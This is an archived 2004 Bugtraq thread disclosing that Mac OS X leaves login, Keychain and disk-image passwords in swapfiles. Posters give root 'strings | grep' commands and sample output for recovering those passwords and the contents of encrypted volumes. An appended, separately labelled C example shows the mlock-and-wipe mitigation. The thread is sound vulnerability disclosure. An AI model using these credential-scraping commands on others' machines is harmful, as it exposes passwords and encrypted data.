Message-ID: <20040716145135.25141.qmail@www.securityfocus.com>
Date: 16 Jul 2004 14:51:35 -0000
From: <johnny@...ckstuff.com>
To: bugtraq@...urityfocus.com
Subject: Re: Mac OS X stores login/Keychain/FileVault passwords on disk
The issue of getting into AES128 encrypted disk images is easy to 
unravel with this swapfile problem. 

We'll start by grabbing the volume name of an AES128 encrypted disk 
image file. Assuming the image name is test1.dmg, try: 

root# strings -8 /var/vm/swapfile* | grep -B1 test1.dmg | grep Volumes 
/Volumes/SECRET 

Armed with the volume name, we can grab the file listing of that 
(supposedly protected) AES128 encrypted disk image.  Since our 
volume name is 'SECRET'. Try: 

root# strings -8 /var/vm/swapfile* | grep "<string>/Volumes/SECRET" 
<string>/Volumes/SECRET/secretporn.pdf</string> 
<string>/Volumes/SECRET/secretphoto.jpg</string> 
<string>/Volumes/SECRET/badmovie.mpg</string> 
<string>/Volumes/SECRET/horriblybadmovie.mpg</string> 
<string>/Volumes/SECRET/naughty.mpg</string> 
<string>/Volumes/SECRET</string> 

To REALLY get at those (supposedly protected) files, we could use the 
password. It's easy to grab it even if it's not in the keychain: 

root# strings -8 /var/vm/swapfile* | grep -B1 "/System/Library/CoreServices/DiskImageMounter.app" 

[... snip ... ] 
-- 
mySecretPasswordTest 
/System/Library/CoreServices/DiskImageMounter.app 
[... snip ... ] 

The only chore may be figuring out which password goes with which 
disk image. And that's not nearly the chore of popping AES128 
encryption... 

j0hnny 

http://johnny.ihackstuff.com 
johnny@...ckstuff.com 



-------------------------------------
From: Adi Kriegisch <adi@...tuwien.ac.at> 
To: bugtraq@...urityfocus.com 
Subject: Re: Mac OS X stores login/Keychain/FileVault passwords on disk 
Sent: Monday, July 12, 2004 9:05 AM 



The swapfiles are deleted on startup -- this means even a clean shutdown 
by the user leaves the passwords on disk. 
So if you lose your powerbook someone might boot it in "target disk mode" 
and will be able to get your password! 

Adi 

=== 
It seems that Mac OS X (10.3.4 tested) doesn't bother clearing memory 
containing sensitive data, or using mlock() to avoid swapping. 

A quick grep of the swapfiles will show up various morsels: 

rez:~> sudo strings -8 /var/vm/swapfile0 |grep -A 4 -i longname 
longname 
password 
<user's password here> 
/bin/zsh 
username 
--- 
... various other occurrences follow 


Grepping for context around "password" also shows up results, and grepping 
for portions of a Keychain password (differing from the login password) 
will also get results. It appears that loginwindow is one of the apps 
involved, I haven't investigated what else is involved. The amount of 
memory and usage patterns of the machine will affect what gets swapped, 
though loginwindow seems likely to get swapped early since it is seldom 
used after login. 

Obviously this is only of interest if an attacker has root (or physical) 
access to a machine, however it does make FileVault or Keychain encryption 
fairly useless. It appears that the swapfiles are removed on shutdown or 
startup, though not wiped - pulling the power from a sleeping machine, 
and/or booting from CD, would quite easily retrieve the password(s). 

Reported to Apple on 21 June, I haven't had any response. It'd be nice if 
they at least said "we're taking a look if it's an issue". 

Matt 
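The two mitigations Matt names above (clearing memory that held a secret, and pinning it with mlock() so it cannot be paged out to /var/vm/swapfile*) as an added example; this is not code from the thread or from Apple. The secret_t helper and the sample passphrase are constructed for illustration, and mlock() may be refused under a low RLIMIT_MEMLOCK, which the helper records rather than hides.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

/* Hypothetical helper: a buffer for secrets that is pinned in RAM and
 * scrubbed before release, so neither swap nor the heap keeps a copy. */
typedef struct {
    unsigned char *buf;
    size_t len;     /* usable bytes, rounded up to whole pages */
    int locked;     /* 1 if mlock() succeeded, 0 if the kernel refused */
} secret_t;

/* Overwrite through a volatile pointer so the compiler cannot drop the
 * "dead store" the way it may with a plain memset() right before free(). */
static void wipe(void *p, size_t n) {
    volatile unsigned char *v = (volatile unsigned char *)p;
    while (n--) *v++ = 0;
}

int secret_alloc(secret_t *s, size_t want) {
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t len = (want + page - 1) / page * page;   /* mlock works on pages */
    void *p = NULL;
    if (posix_memalign(&p, page, len) != 0) return -1;
    memset(p, 0, len);
    s->buf = p;
    s->len = len;
    s->locked = (mlock(p, len) == 0);   /* pinned pages never reach swap */
    return 0;
}

/* Scrub the secret; returns how many bytes are still non-zero (0 = clean). */
size_t secret_wipe(secret_t *s) {
    size_t leftover = 0;
    wipe(s->buf, s->len);
    for (size_t i = 0; i < s->len; i++) leftover += (s->buf[i] != 0);
    return leftover;
}

void secret_free(secret_t *s) {
    secret_wipe(s);                  /* never return dirty pages to the allocator */
    if (s->locked) munlock(s->buf, s->len);
    free(s->buf);
    s->buf = NULL; s->len = 0; s->locked = 0;
}

int main(void) {
    secret_t s;
    if (secret_alloc(&s, 64) != 0) return 1;
    strcpy((char *)s.buf, "constructed-sample-passphrase");   /* placeholder */
    printf("pinned in RAM: %s\n", s.locked ? "yes" : "no (mlock refused)");
    printf("bytes left after wipe: %zu\n", secret_wipe(&s));
    secret_free(&s);
    return 0;
}
```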

